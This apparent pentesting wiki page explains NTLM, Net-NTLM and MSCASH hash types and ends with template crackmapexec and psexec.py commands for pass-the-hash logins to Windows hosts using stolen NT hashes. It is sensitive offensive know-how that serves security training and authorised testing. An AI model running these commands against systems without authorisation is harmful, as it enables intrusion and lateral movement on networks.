# Pass the hash

Before we talk about this attack, let's clarify some things, let's talk about NTLM vs. NTLMv1/v2 vs. Net-NTLMv1/v2 vs MSCASHv1/v2 because there's a lot of phrasing out there and sometimes it can get confusing for people who are not used to manipulate these.

{% hint style="warning" %}
**NTLM ≠ ( NTLMv1/v2 === Net-NTLMv1/v2 )≠ MSCASHv1/v2**
{% endhint %}

In short :

* **NTLM** (aka NT) hashes are **local users hashes**
* **NTLMv1/v2** (aka Net-NTLMv1/v2) hashes are **used for network authentication**
* **MSCASHv1/v2** (aka DCCv1/v2) hashes are **domain users hashes**

NTLM hashes are stored in the Security Account Manager (SAM) database and in Domain Controller's NTDS.dit database. They look like this:

![](https://782540430-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LzBjY2lU8TBX2McCswT%2F-M1A7OgCHkgVaqmz_kr1%2F-M1A9m-eu1CP-EmOlc66%2Fimage.png?alt=media\&token=bb48858e-0342-4411-9104-137e7e6b993b)

Contrary to what you'd expect, the LM hash is the one *before* the semicolon and the NT hash is the one *after* the semicolon. Starting with Windows Vista and Windows Server 2008, by default, only the NT hash is stored.\
\
Net-NTLM hashes on the other hand are used for network authentication (they are derived from a challenge/response algorithm and are based on the user's NT hash). Here's an example of a Net-NTLMv2 (a.k.a NTLMv2) hash:

```
admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030
```

From a pentesting perspective:

* You **CAN** perform Pass-The-Hash attacks with **NTLM** hashes.
* You **CANNOT** perform Pass-The-Hash attacks with **Net-NTLM** hashes.

Now on to the attack to pass the hash you can still use crackmapexec :

```
crackmapexec <ip_range>/<CIDR> -u user -H hash(only NT part) --local
```

obviously you can use other tools too such as psexec:

```
psexec.py user:@ip_addr -hashes (the whole hash)
```